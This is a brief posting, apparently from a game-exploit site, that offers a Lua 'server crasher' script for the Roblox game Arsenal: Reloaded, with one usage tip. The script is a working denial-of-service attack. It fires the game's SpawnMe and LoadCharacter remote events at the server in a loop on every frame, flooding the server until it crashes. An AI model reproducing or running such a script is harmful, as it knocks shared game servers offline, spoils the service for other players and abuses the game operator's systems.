Arsenal: Reloaded Script | SERVER CRASHER

Created by Bluwu#3621

Features:

  • SERVER CRASHER
    • Load into the menu, pick a team, and run the script
local Network = game:GetService("ReplicatedStorage"):WaitForChild("Network")

while game.RunService.Stepped:Wait() do
   task.spawn(function()
       Network.SpawnMe:FireServer()
       Network.LoadCharacter:FireServer()
   end)
end